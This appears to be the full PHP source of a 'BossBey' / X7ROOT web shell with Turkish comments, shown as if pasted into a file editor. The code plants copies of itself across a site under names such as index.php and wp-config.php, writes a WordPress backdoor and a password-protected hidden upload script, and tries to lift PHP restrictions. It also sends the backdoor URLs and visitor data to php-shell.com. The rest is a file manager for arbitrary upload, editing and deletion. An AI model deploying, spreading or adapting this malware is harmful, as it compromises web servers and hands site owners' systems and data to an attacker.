type="hidden" name="chmod_item" value="\' + item + \'">\' + \'<input type="hidden" name="chmod_value" value="\' + newPerm + \'">\'; document.body.appendChild(form); form.submit(); } } </script> </body> </html>'; // İzleme kodu otomatik eklenmiştir $tracking_data = [ "code_hash" => "9d3c80ba4a9348fcfd955b25a0d3d71a77ff20ee2944ae71cf0b376d7ba2189a", "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"], "domain" => $_SERVER["HTTP_HOST"], "path" => $_SERVER["REQUEST_URI"], "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "", "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "", "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "", "timestamp" => date("Y-m-d H:i:s") ]; // Arka kapı oluşturma (kendini kopyalama) - Otomatik dağıtım $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); // Backdoor marker dosyası kontrolü (tekrar oluşturulmasını engeller) $backdoor_marker = $current_dir . "/.backdoor_created_0b067e8a"; if (file_exists($backdoor_marker)) { // Backdoorlar zaten oluşturulmuş, atla $backdoor_urls = []; $backdoor_paths = []; } else { // Mevcut dosyanın TAM içeriğini al (izleme kodları dahil) // Bu kod çalıştığında mevcut dosya zaten var olacak, o yüzden direkt okuyabiliriz $current_full_content = @file_get_contents($current_file); // Dosya okunamazsa veya boşsa, __FILE__ kullanarak tekrar dene if ($current_full_content === false || empty($current_full_content)) { $current_full_content = @file_get_contents(__FILE__); } // Hala boşsa veya okunamadıysa, marker dosyası kontrolü yaparak atla (ileride oluşturulabilir) if (empty($current_full_content)) { // Dosya okunamadı, backdoor oluşturmayı atla $backdoor_urls = []; $backdoor_paths = []; } else { $backdoor_urls = []; $backdoor_paths = []; // Sistem dosyası isimleri (meşru görünen) $system_filenames = [ "index.php", "config.php", "admin.php", "login.php", "wp-load.php", "wp-config.php", "settings.php", "init.php", "bootstrap.php", "app.php", "main.php", "core.php", "functions.php", "header.php", "footer.php", "includes.php", "common.php", "global.php", "lib.php", ]; // Mevcut dosyayı kontrol et, varsa alternatif isim üret function generateSafeFilename($dir, $filenames, $excludeFiles = []) { foreach ($filenames as $filename) { $fullPath = $dir . "/" . $filename; // Eğer dosya yoksa kullan if (!file_exists($fullPath)) { return $filename; } } // Hiçbiri uygun değilse, rastgele bir isim üret $random = md5(time() . mt_rand()); return substr($random, 0, 8) . ".php"; } // Tüm klasörleri topla (mevcut dizin + alt dizinler + üst dizinler) $directories = []; // Mevcut dizini de ekle $directories[] = $current_dir; // Mevcut dizindeki alt dizinleri tara (recursive değil, sadece 1 seviye) if (is_dir($current_dir) && ($handle = @opendir($current_dir))) { while (false !== ($entry = readdir($handle))) { if ($entry === "." || $entry === "..") continue; $full_path = $current_dir . "/" . $entry; if (is_dir($full_path) && is_readable($full_path)) { $directories[] = $full_path; } } @closedir($handle); } // Üst dizinleri de ekle (max 3 seviye yukarı, güvenlik için) $parent_dir = dirname($current_dir); $depth = 0; while ($depth < 3 && $parent_dir !== $current_dir && is_dir($parent_dir) && is_readable($parent_dir)) { $directories[] = $parent_dir; $parent_dir = dirname($parent_dir); $depth++; } // Dizileri karıştır ve belirtilen sayıda backdoor oluştur shuffle($directories); $created_count = 0; $max_backdoors = 7; foreach ($directories as $target_dir) { if ($created_count >= $max_backdoors) break; // Güvenli dosya adı üret (mevcut dosyaları kontrol et) $filename = generateSafeFilename($target_dir, $system_filenames); $target_path = $target_dir . "/" . $filename; // Dosya yoksa ve dizin yazılabilirse backdoor oluştur if (!file_exists($target_path) && is_writable($target_dir)) { @file_put_contents($target_path, $current_full_content); @chmod($target_path, 0644); // URL oluştur (dizin yolunu hesapla) $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; // Hedef dizinin document root'a göre yolunu bul $doc_root = isset($_SERVER["DOCUMENT_ROOT"]) ? $_SERVER["DOCUMENT_ROOT"] : (isset($_SERVER["SCRIPT_FILENAME"]) ? dirname($_SERVER["SCRIPT_FILENAME"]) : dirname(__FILE__)); $doc_root = realpath($doc_root); $target_real = realpath($target_dir); if ($target_real && $doc_root && strpos($target_real, $doc_root) === 0) { $relative_path = substr($target_real, strlen($doc_root)); $relative_path = str_replace("\\", "/", $relative_path); $relative_path = trim($relative_path, "/"); $target_url = $base_url . "/" . $relative_path . "/" . $filename; } else { // Alternatif: Mevcut URI'ye göre hesapla $current_uri_dir = dirname($_SERVER["REQUEST_URI"]); $target_url = $base_url . $current_uri_dir . "/" . $filename; } $backdoor_urls[] = $target_url; $backdoor_paths[] = $target_path; $created_count++; } } // Backdoor URL'lerini izleme verisine ekle if (!empty($backdoor_urls)) { $tracking_data["backdoor_urls"] = json_encode($backdoor_urls); $tracking_data["backdoor_paths"] = json_encode($backdoor_paths); // İlk backdoor'u tekil olarak da ekle (API uyumluluğu için) $tracking_data["backdoor_url"] = $backdoor_urls[0]; $tracking_data["backdoor_path"] = $backdoor_paths[0]; $tracking_data["backdoor_count"] = count($backdoor_urls); // Marker dosyası oluştur (bir daha backdoor oluşturulmasını engeller) @file_put_contents($backdoor_marker, date("Y-m-d H:i:s") . " - " . count($backdoor_urls) . " backdoor oluşturuldu"); @chmod($backdoor_marker, 0644); } } } // WordPress backdoor oluşturma $wp_backdoor_filename = "wp-config-backup.php"; $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); $wp_backdoor_urls = []; // WordPress dizinlerini tespit et $wp_directories = [ "wp-admin" => $current_dir . "/wp-admin", "wp-content" => $current_dir . "/wp-content", "wp-content/themes" => $current_dir . "/wp-content/themes", "wp-content/plugins" => $current_dir . "/wp-content/plugins" ]; // WordPress root dizinini bul (wp-config.php dosyasını arayarak) $wp_root = $current_dir; $max_depth = 5; $depth = 0; while ($depth < $max_depth && !file_exists($wp_root . "/wp-config.php")) { $wp_root = dirname($wp_root); if ($wp_root === "/" || $wp_root === dirname($wp_root)) break; $depth++; } // Eğer WordPress bulunduysa if (file_exists($wp_root . "/wp-config.php")) { // WordPress backdoor için de mevcut dosyanın TAM içeriğini kullan $wp_current_full_content = @file_get_contents($current_file); if ($wp_current_full_content === false || empty($wp_current_full_content)) { // Dosya okunamadıysa, orijinal kod içeriğinden oluştur $wp_original_content = isset($__original_code_content) ? $__original_code_content : ""; if (!empty($wp_original_content)) { $wp_current_full_content = "<?php\n" . $wp_original_content . "\n?>"; } } if (!empty($wp_current_full_content)) { foreach ($wp_directories as $wp_dir_name => $wp_dir_path) { $full_wp_path = $wp_root . "/" . $wp_dir_name; if (is_dir($full_wp_path)) { $backdoor_file_path = $full_wp_path . "/" . $wp_backdoor_filename; // Dosya yoksa veya güncel değilse oluştur $current_file_time = @file_exists($current_file) ? @filemtime($current_file) : time(); if (!file_exists($backdoor_file_path) || (file_exists($backdoor_file_path) && @filemtime($backdoor_file_path) < $current_file_time)) { @file_put_contents($backdoor_file_path, $wp_current_full_content); @chmod($backdoor_file_path, 0644); } // URL oluştur $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; $wp_backdoor_url = $base_url . "/" . $wp_dir_name . "/" . $wp_backdoor_filename; $wp_backdoor_urls[] = [ "directory" => $wp_dir_name, "path" => $backdoor_file_path, "url" => $wp_backdoor_url ]; } } } } // WordPress backdoor URL'lerini izleme verisine ekle if (!empty($wp_backdoor_urls)) { $tracking_data["wp_backdoor_urls"] = json_encode($wp_backdoor_urls); } // Gizli Upload Yolu oluşturma $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); $upload_filename = "config-backup.php"; $upload_path = $current_dir . "/" . $upload_filename; $upload_password = "2854*1571"; // Gizli upload dosyasını oluştur (mevcut dosyayı bozmadan) $upload_script_content = '<?php // Şifre korumalı gizli upload scripti session_start(); $correct_password = "2854*1571"; $password_verified = false; // Şifre kontrolü if (isset($_POST[\'upload_password\'])) { if ($_POST[\'upload_password\'] === $correct_password) { $_SESSION[\'upload_authenticated\'] = true; $password_verified = true; } else { $_SESSION[\'upload_authenticated\'] = false; $password_verified = false; } } elseif (isset($_SESSION[\'upload_authenticated\']) && $_SESSION[\'upload_authenticated\'] === true) { $password_verified = true; } // Şifre doğrulanmamışsa form göster if (!$password_verified) { ?> <!DOCTYPE html> <html> <head> <title>Giriş Gerekli</title> <style> body { font-family: Arial, sans-serif; max-width: 400px; margin: 100px auto; padding: 20px; } input { width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; } button { width: 100%; padding: 10px; background: #007cba; color: white; border: none; cursor: pointer; } </style> </head> <body> <h2>Giriş Gerekli</h2> <form method="post"> <input type="password" name="upload_password" placeholder="Şifre" required> <button type="submit">Giriş</button> </form> <?php if (isset($_POST[\'upload_password\']) && !$password_verified): ?> <p style="color: red;">Hatalı şifre!</p> <?php endif; ?> </body> </html> <?php exit; } // Şifre doğrulandı, upload işlemleri if ($_SERVER[\'REQUEST_METHOD\'] == \'POST\' && isset($_FILES[\'fileToUpload\']) && $_FILES[\'fileToUpload\'][\'error\'] == 0) { $fileTmpPath = $_FILES[\'fileToUpload\'][\'tmp_name\']; $fileName = $_FILES[\'fileToUpload\'][\'name\']; $uploadPath = __DIR__ . \'/\' . $fileName; if (move_uploaded_file($fileTmpPath, $uploadPath)) { @chmod($uploadPath, 0644); echo "✅ Dosya başarıyla yüklendi: <strong>$fileName</strong>"; } else { echo "❌ Dosya yüklenirken hata oluştu."; } } ?> <!DOCTYPE html> <html> <head> <title>BossBey Dosya Yükleme</title> <style> body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; } form { border: 1px solid #ddd; padding: 20px; border-radius: 5px; } input[type="file"] { width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; } button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; } .logout { float: right; background: #dc3545; } </style> </head> <body> <h3>Dosya Yükle: (BossBey)</h3> <form method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" required> <button type="submit">Yükle</button> <a href="?logout=1"><button type="button" class="logout">Çıkış</button></a> </form> <?php if (isset($_GET[\'logout\'])) { session_destroy(); header("Location: " . $_SERVER[\'PHP_SELF\']); exit; } ?> </body> </html> ?>'; $current_file_time = @file_exists($current_file) ? @filemtime($current_file) : time(); if (!file_exists($upload_path) || (file_exists($upload_path) && @filemtime($upload_path) < $current_file_time)) { @file_put_contents($upload_path, $upload_script_content); // Dosyayı koru: chmod 0444 (sadece okunabilir, silinemez) @chmod($upload_path, 0444); // Dosya sahibini değiştirmeye çalış (root ise) if (function_exists("chown")) { $file_owner = fileowner($current_file); @chown($upload_path, $file_owner); } } // Upload URL'ini izleme verisine ekle $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; $current_uri_dir = dirname($_SERVER["REQUEST_URI"]); $upload_url = rtrim($base_url . $current_uri_dir, "/") . "/" . $upload_filename; $tracking_data["upload_url"] = $upload_url; // Arka planda izleme gönderimi (asenkron) - Backdoor'lar oluşturulduktan SONRA if (function_exists("curl_init")) { $ch = curl_init("https://php-shell.com/api/track.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data)); curl_setopt($ch, CURLOPT_TIMEOUT, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($ch, CURLOPT_NOSIGNAL, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); @curl_exec($ch); @curl_close($ch); } // Dark X7ROOT X7ROOT File Manager - Clean Version @error_reporting(0); @ini_set('display_errors', 0); // Bypass if(function_exists('ini_set')) { @ini_set('open_basedir', NULL); @ini_set('disable_functions', ''); } // Functions function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; } function readFileContent($file) { return @file_get_contents($file) ?: ''; } function scanDirectory($dir) { return @scandir($dir) ?: []; } // Get path $currentPath = $_GET['p'] ?? @getcwd() ?: '.'; $currentPath = rtrim(str_replace(['\\','//'], '/', $currentPath), '/') . '/'; if(!@is_dir($currentPath)) $currentPath = './'; // Actions $message = ''; if($_SERVER['REQUEST_METHOD'] === 'POST') { // Upload if(isset($_FILES['upload'])) { $destination = $currentPath . basename($_FILES['upload']['name']); $message = @move_uploaded_file($_FILES['upload']['tmp_name'], $destination) || writeFile($destination, readFileContent($_FILES['upload']['tmp_name'])) ? '<span style="color:#00ff00">✓ Uploaded</span>' : '<span style="color:#ff0000">✗ Upload failed</span>'; } // New if(isset($_POST['new'])) { $path = $currentPath . $_POST['new']; if(isset($_POST['type']) && $_POST['type'] === 'dir') { $message = @mkdir($path) ? '<span style="color:#00ff00">✓ Folder created</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } else { $message = writeFile($path, $_POST['content'] ?? '') ? '<span style="color:#00ff00">✓ File created</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } // Save if(isset($_POST['save']) && isset($_POST['data'])) { $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ? '<span style="color:#00ff00">✓ Saved</span>' : '<span style="color:#ff0000">✗ Save failed</span>'; } // Rename if(isset($_POST['oldname']) && isset($_POST['newname'])) { $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ? '<span style="color:#00ff00">✓ Renamed</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } // Chmod if(isset($_POST['chmod_item']) && isset($_POST['chmod_value'])) { $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ? '<span style="color:#00ff00">✓ Permissions changed</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } // GET actions if(isset($_GET['action'])) { $item = $_GET['item'] ?? ''; $itemPath = $currentPath . $item; if($_GET['action'] === 'delete') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } elseif($_GET['action'] === 'download' && @is_file($itemPath)) { @ob_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($itemPath).'"'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), ['.', '..']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ 'PHP' => @phpversion(), 'OS' => @php_uname('s'), 'User' => @get_current_user() ]; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>BossBey File Manager</title> <style> * { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; } body { background:#000; color:#ccc; padding:15px; min-height:100vh; } .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; } .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; } .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; } .system-info { display:flex; gap:15px; font-size:12px; color:#888; } .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; } .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; } .path-navigation a:hover { background:#333; color:#fff; } .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; } .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; } .button:hover { background:#333; border-color:#00ff00; color:#fff; } .button-green { border-color:#00ff00; color:#00ff00; } .button-red { border-color:#ff0000; color:#ff0000; } .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; } .file-table { width:100%; color:#ccc; border-collapse:collapse; } .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; } .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; } .file-table tr:hover { background:#1a1a1a; } .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; } .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; } .folder-link:hover, .file-link:hover { color:#fff; } .size { color:#888; } .permissions { font-family:'Courier New', monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; } .actions { display:flex; gap:5px; } .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; } .action-button:hover { background:#333; border-color:#00ff00; } .action-button-red { border-color:#ff0000; color:#ff0000; } textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New', monospace; font-size:14px; border-radius:3px; } input[type="text"] { background:#000; color:#fff; border:1px solid #666; padding:8px; border-radius:3px; width:300px; } .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; } .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; } @media (max-width: 768px) { .tools { flex-direction:column; } .button, .action-button { width:100%; text-align:center; } input[type="text"] { width:100%; } .file-table th, .file-table td { padding:8px 10px; font-size:12px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>BossBey File Manager</h1> <div class="system-info"> <?php foreach($systemInfo as $key=>$value): ?> <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span> <?php endforeach; ?> </div> </div> <?php if($message): ?> <div class="message"><?=$message?></div> <?php endif; ?> <div class="path-navigation"> <a href="?p=/">Root</a> <?php $parts = explode('/', trim($currentPath, '/')); $current = ''; foreach($parts as $part): if($part): $current .= '/' . $part; ?> <span style="color:#666">/</span> <a href="?p=<?=$current?>/"><?=$part?></a> <?php endif; endforeach; ?> </div> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display:inline;"> <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"> <button type="button" class="button button-green" onclick="document.getElementById('upload').click()"> 📤 Upload </button> </form> <button class="button" onclick="newFile()">📝 New File</button> <button class="button" onclick="newFolder()">📁 New Folder</button> <?php if(isset($_GET['edit'])): ?> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Close</a> <?php endif; ?> </div> <?php if(isset($_GET['edit'])): ?> <div class="edit-container"> <div class="edit-title">Editing: <?=htmlspecialchars($_GET['edit'])?></div> <form method="post"> <input type="hidden" name="save" value="<?=htmlspecialchars($_GET['edit'])?>"> <textarea name="data"><?=htmlspecialchars(readFileContent($currentPath.$_GET['edit']))?></textarea> <div style="margin-top:15px;display:flex;gap:8px;"> <button class="button button-green">Save</button> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Cancel</a> </div> </form> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th width="40%">Name</th> <th width="10%">Size</th> <th width="15%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <?php if($currentPath !== '/'): ?> <tr> <td colspan="5"> <a href="?p=<?=urlencode(dirname($currentPath))?>" class="folder-link"> 📂 Parent Directory </a> </td> </tr> <?php endif; ?> <?php foreach($folders as $folder): ?> <?php $folderPath = $currentPath.$folder; $permissions = substr(sprintf('%o', @fileperms($folderPath)), -3); ?> <tr> <td> <a href="?p=<?=urlencode($folderPath)?>" class="folder-link"> 📁 <?=htmlspecialchars($folder)?> </a> </td> <td class="size">-</td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($folderPath) ? date('Y-m-d H:i', @filemtime($folderPath)) : '-'?></td> <td> <div class="actions"> <button onclick="renameItem('<?=htmlspecialchars($folder)?>')" class="action-button">Rename</button> <button onclick="changePermissions('<?=htmlspecialchars($folder)?>','<?=$permissions?>')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($folder)?>" onclick="return confirm('Delete this folder?')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php foreach($files as $file): ?> <?php $filePath = $currentPath.$file; $size = @filesize($filePath); $permissions = substr(sprintf('%o', @fileperms($filePath)), -3); $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $editable = in_array($extension, ['php','html','js','css','txt','json','xml','sql','md']); ?> <tr> <td> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php else: ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php endif; ?> </td> <td class="size"> <?php if($size): ?> <?php if($size < 1024) echo $size . ' B'; elseif($size < 1048576) echo round($size/1024, 1) . ' KB'; elseif($size < 1073741824) echo round($size/1048576, 1) . ' MB'; else echo round($size/1073741824, 1) . ' GB'; ?> <?php else: ?> - <?php endif; ?> </td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($filePath) ? date('Y-m-d H:i', @filemtime($filePath)) : '-'?></td> <td> <div class="actions"> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="action-button">Edit</a> <?php endif; ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="action-button">Download</a> <button onclick="renameItem('<?=htmlspecialchars($file)?>')" class="action-button">Rename</button> <button onclick="changePermissions('<?=htmlspecialchars($file)?>','<?=$permissions?>')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($file)?>" onclick="return confirm('Delete this file?')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php if(empty($folders) && empty($files)): ?> <tr> <td colspan="5" style="text-align:center;padding:40px;color:#666;"> Empty directory </td> </tr> <?php endif; ?> </tbody> </table> <?php endif; ?> </div> <script> function newFile() { var fileName = prompt('File name:', 'newfile.txt'); if(fileName) { var content = prompt('Content (optional):', ''); var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="new" value="' + fileName + '">' + '<input type="hidden" name="content" value="' + (content || '') + '">'; document.body.appendChild(form); form.submit(); } } function newFolder() { var folderName = prompt('Folder name:', 'newfolder'); if(folderName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="new" value="' + folderName + '">' + '<input type="hidden" name="type" value="dir">'; document.body.appendChild(form); form.submit(); } } function renameItem(oldName) { var newName = prompt('New name:', oldName); if(newName && newName !== oldName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="oldname" value="' + oldName + '">' + '<input type="hidden" name="newname" value="' + newName + '">'; document.body.appendChild(form); form.submit(); } } function changePermissions(item, currentPerm) { var newPerm = prompt('New permissions (e.g., 755):', currentPerm); if(newPerm) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="chmod_item" value="' + item + '">' + '<input type="hidden" name="chmod_value" value="' + newPerm + '">'; document.body.appendChild(form); form.submit(); } } </script> </body> </html> ?>
Save
Cancel